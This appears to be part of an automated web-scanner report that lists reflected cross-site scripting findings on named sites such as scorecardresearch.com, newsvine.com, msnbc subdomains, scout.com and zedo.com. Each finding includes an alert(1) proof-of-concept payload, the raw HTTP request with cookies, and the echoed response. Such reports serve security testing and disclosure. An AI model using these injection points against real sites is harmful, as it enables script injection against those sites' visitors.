5.165. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 43a79<script>alert(1)</script>dd3f69c507c was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=613540443a79<script>alert(1)</script>dd3f69c507c&c3=15&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"613540443a79<script>alert(1)</script>dd3f69c507c", c3:"15", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.166. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5141c<script>alert(1)</script>2e5b41528d3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=155141c<script>alert(1)</script>2e5b41528d3&c4=13236&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:00 GMT
Date: Sun, 30 Jan 2011 01:41:00 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"155141c<script>alert(1)</script>2e5b41528d3", c4:"13236", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.167. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 9293a<script>alert(1)</script>f40783d132b was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=132369293a<script>alert(1)</script>f40783d132b&c5=&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:00 GMT
Date: Sun, 30 Jan 2011 01:41:00 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"132369293a<script>alert(1)</script>f40783d132b", c5:"", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.168. http://b.scorecardresearch.com/beacon.js [c5 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload c4a9f<script>alert(1)</script>8ebac23ddb was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=c4a9f<script>alert(1)</script>8ebac23ddb&c6=&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:00 GMT
Date: Sun, 30 Jan 2011 01:41:00 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"c4a9f<script>alert(1)</script>8ebac23ddb", c6:"", c10:"3203787", c15:"", c16:"", r:""});

5.169. http://b.scorecardresearch.com/beacon.js [c6 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload b3111<script>alert(1)</script>7cb1ccd4cdb was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=13236&c5=&c6=b3111<script>alert(1)</script>7cb1ccd4cdb&c10=3203787&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Feb 2011 01:41:01 GMT
Date: Sun, 30 Jan 2011 01:41:01 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"13236", c5:"", c6:"b3111<script>alert(1)</script>7cb1ccd4cdb", c10:"3203787", c15:"", c16:"", r:""});

5.170. http://bodyodd.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bodyodd.msnbc.msn.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a15c"><script>alert(1)</script>f4addc07d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1a15c"><script>alert(1)</script>f4addc07d04=1 HTTP/1.1
Host: bodyodd.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.171. http://boyle.newsvine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://boyle.newsvine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab874"-alert(1)-"1395f8ac659 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?ab874"-alert(1)-"1395f8ac659=1 HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:51:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=8d410fec781195f3ae452149bdba91fe; expires=Sat, 25-Jan-2031 17:51:54 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 88082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
ML = "";currentCommentBox = commentId;var renderedCommentBox = renderCommentBox ("http://www.newsvine.com/_action","http://www.polls.newsvine.com/_vine/images/_/","1357996","http://boyle.newsvine.com/?ab874"-alert(1)-"1395f8ac659=1", 0,commentId, "", "", groupId, friendListId, threadId, privateLabel, "01", -1);getElement("dynamicCommentBox_"+commentId).innerHTML = renderedCommentBox;placeSpellChecker ("commentsTextDiv_"+commen
...[SNIP]...

5.172. http://cartoonblog.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cartoonblog.msnbc.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bcba"><script>alert(1)</script>a8948eec705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9bcba"><script>alert(1)</script>a8948eec705=1 HTTP/1.1
Host: cartoonblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.173. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn-cms.scout.com
Path:	/feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9abcf<script>alert(1)</script>b5f8440495c was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%27%26pid%3D88%26yr%3D2011&format=json&callback=$.analytics.report9abcf<script>alert(1)</script>b5f8440495c HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:04 GMT
Connection: close
Akamai: True
Content-Length: 360

$.analytics.report9abcf<script>alert(1)</script>b5f8440495c({"network":"Scout","site":"recruiting","sports":[],"categories":[],"pagetype":"Recruiting","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"",
...[SNIP]...

5.174. http://cdn-forums.scout.com/adfeed.ashx [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn-forums.scout.com
Path:	/adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dae03<script>alert(1)</script>e852a0a6e49 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adfeed.ashx?s=73&format=json&callback=$.showAd.cacheAdCodesdae03<script>alert(1)</script>e852a0a6e49 HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4'&pid=88&yr=2011
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1295040115.3.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=202704078.801620371.1294455998.1294851033.1295040115.3; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Mbrd8
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 01:42:14 GMT
Connection: close
Akamai: True
Content-Length: 334

$.showAd.cacheAdCodesdae03<script>alert(1)</script>e852a0a6e49({"ads":[{"code":"SPTSN1","height":90,"type":"DISPLAY","width":728},{"code":"SPTSN3","height":600,"type":"DISPLAY","width":160},{"code":"SPTSN4","height":250,"type":"DISPLAY","width":300},{"code":"SPTS
...[SNIP]...

5.175. http://cosmiclog.msnbc.redacted/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cosmiclog.msnbc.redacted
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c4ad"><script>alert(1)</script>299dbf28056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5c4ad"><script>alert(1)</script>299dbf28056=1 HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.176. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 252d4'%3balert(1)//21a050c29ea was submitted in the $ parameter. This input was echoed as 252d4';alert(1)//21a050c29ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=252d4'%3balert(1)//21a050c29ea&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:252d4';alert(1)//21a050c29ea;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=254
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:30 GMT
Connection: close
Content-Length: 2378

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',252d4';alert(1)//21a050c29ea';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,252d4';alert(1)//21a050c29ea;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

...[SNIP]...

5.177. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5a47"%3balert(1)//a05e4eb410d was submitted in the $ parameter. This input was echoed as a5a47";alert(1)//a05e4eb410d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=a5a47"%3balert(1)//a05e4eb410d&s=123&z=0.2442760558333248 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; FFad=0:0:1:0:0; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=929:a5a47";alert(1)//a05e4eb410d;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:18:29 GMT
Connection: close
Content-Length: 2392

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat=',a5a47";alert(1)//a05e4eb410d';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,a5a47";alert(1)//a05e4eb410d;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;

var zzStr = "s=123;u=INmz6woBADYAAHrQ5V4AAACH~010411;z=" + M
...[SNIP]...

5.178. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d2/jsc/fm.js

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e50f4'-alert(1)-'430b04548c0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-401/d2/jsc/fm.js?c=e50f4'-alert(1)-'430b04548c0 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7; ZFFAbh=749B826,20|1483_759#365; FFad=0:0:0:1:0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
